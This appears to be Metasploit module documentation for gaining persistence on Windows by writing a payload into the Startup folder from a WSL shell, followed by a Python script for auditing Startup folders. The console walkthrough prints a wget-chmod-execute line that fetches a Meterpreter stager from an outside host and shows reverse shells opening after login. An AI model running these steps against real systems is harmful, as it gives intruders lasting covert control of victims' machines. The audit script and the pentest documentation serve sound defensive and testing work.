GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/persistence/wsl/startup_folder.md

Vulnerable Application

This module establishes persistence by writing a payload into the Windows Startup folder from within the Windows Subsystem for Linux (WSL) environment. The payload is then executed on Windows user login.

Verified on Windows 10 with Ubuntu 24.04 WSL distribution.

Verification Steps

  1. Get a shell on WSL (WSL can be started in a user or an admin context)

  2. use exploit/linux/persistence/wsl/startup_folder

  3. set SESSION <id>

  4. exploit

Options

PAYLOAD_NAME

Name of the backdoor executable. Defaults to a random name.

CONTEXT

Target each user or all users (system). Defaults to USER. Choices are USER, SYSTEM.

USER

Only required when CONTEXT is set to USER. The user to exploit, or ALL for all of them. Defaults to ALL.
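As an added example that is not part of the module or of the Metasploit project, the following Python script maps the CONTEXT and USER options above to the Startup folders they select, as seen through the WSL mount of C:, and audits those folders for login-time executables, which is the check a responder runs after a drop like the one in the scenario. The SYSTEM folder path, the drive mount point and the fixture contents are assumptions; only the USER path comes from the module's output.

```python
import os
import time
from pathlib import Path

# Layouts of the two Startup folders relative to the WSL mount of C: (normally /mnt/c).
# USER is the path the module printed; SYSTEM is the standard ProgramData location (assumed).
USER_STARTUP = Path("AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")
SYSTEM_STARTUP = Path("ProgramData/Microsoft/Windows/Start Menu/Programs/Startup")
# Item types Explorer launches at login; desktop.ini and similar are ignored.
EXEC_SUFFIXES = {".exe", ".bat", ".cmd", ".lnk", ".vbs", ".ps1", ".js", ".hta", ".scr"}

def startup_dirs(drive_root, context="USER", user="ALL"):
    """Resolve the folders the module's CONTEXT/USER options select, as (scope, owner, path)."""
    if context.upper() == "SYSTEM":
        return [("SYSTEM", "-", Path(drive_root) / SYSTEM_STARTUP)]
    if context.upper() != "USER":
        raise ValueError("CONTEXT must be USER or SYSTEM")
    users_dir = Path(drive_root) / "Users"
    if user.upper() == "ALL":  # every profile under C:\Users, the module's default
        profiles = sorted(p for p in users_dir.iterdir() if p.is_dir()) if users_dir.is_dir() else []
    else:
        profiles = [users_dir / user]
    return [("USER", p.name, p / USER_STARTUP) for p in profiles]

def audit_startup(drive_root, max_age_days=None, now=None):
    """List executable items in every Startup folder, newest first; max_age_days narrows
    the list to what was dropped around the time of a suspected compromise."""
    now = time.time() if now is None else now
    findings = []
    for scope, owner, folder in startup_dirs(drive_root, "USER") + startup_dirs(drive_root, "SYSTEM"):
        if not folder.is_dir():
            continue
        for item in folder.iterdir():
            if not item.is_file() or item.suffix.lower() not in EXEC_SUFFIXES:
                continue
            age = (now - item.stat().st_mtime) / 86400
            if max_age_days is not None and age > max_age_days:
                continue
            findings.append({"scope": scope, "owner": owner, "path": str(item),
                             "size": item.stat().st_size, "age_days": round(age, 2)})
    return sorted(findings, key=lambda f: f["age_days"])

def build_sample_drive(root):
    """Constructed fixture, not real data: a C: layout with one fresh drop and one old item."""
    user, system = Path(root) / "Users" / "windows" / USER_STARTUP, Path(root) / SYSTEM_STARTUP
    user.mkdir(parents=True, exist_ok=True); system.mkdir(parents=True, exist_ok=True)
    (user / "dXSkUY.exe").write_bytes(b"MZ" + b"\0" * 62)  # name taken from the module run below
    (user / "desktop.ini").write_text("[.ShellClassInfo]\n")
    (system / "Updater.lnk").write_bytes(b"L\0\0\0")
    os.utime(system / "Updater.lnk", (time.time() - 30 * 86400,) * 2)  # backdate 30 days
```

On a real host, `audit_startup("/mnt/c", max_age_days=7)` from the WSL shell lists what was dropped in the last week across every profile and the machine-wide folder.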

Scenarios

Tested on Windows 10 with Ubuntu 22.04 WSL

Initial access into WSL

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ql4GGpDh --no-check-certificate http://1.1.1.1:8082/l; chmod +x Ql4GGpDh; ./Ql4GGpDh& disown
msf exploit(multi/script/web_delivery) >
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:49859) at 2025-12-28 11:06:57 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : win10prolicensed.localdomain
OS           : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: windows
meterpreter > background
[*] Backgrounding session 1...
```

Install persistence

```
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/wsl/startup_folder
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/wsl/startup_folder) > set session 1
session => 1
msf exploit(linux/persistence/wsl/startup_folder) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(linux/persistence/wsl/startup_folder) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(linux/persistence/wsl/startup_folder) >
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux. This module works with: Windows.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Inside WSL environment
[+] The target appears to be vulnerable. Likely exploitable
[+] Writing payload to /mnt/c/Users/windows/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/dXSkUY.exe
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/win10prolicensed.localdomain_20251228.0757/win10prolicensed.localdomain_20251228.0757.rc
```

Log out of Windows and back in

```
[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
msf exploit(linux/persistence/wsl/startup_folder) >
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49867) at 2025-12-28 11:08:56 -0500
msf exploit(linux/persistence/wsl/startup_folder) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
```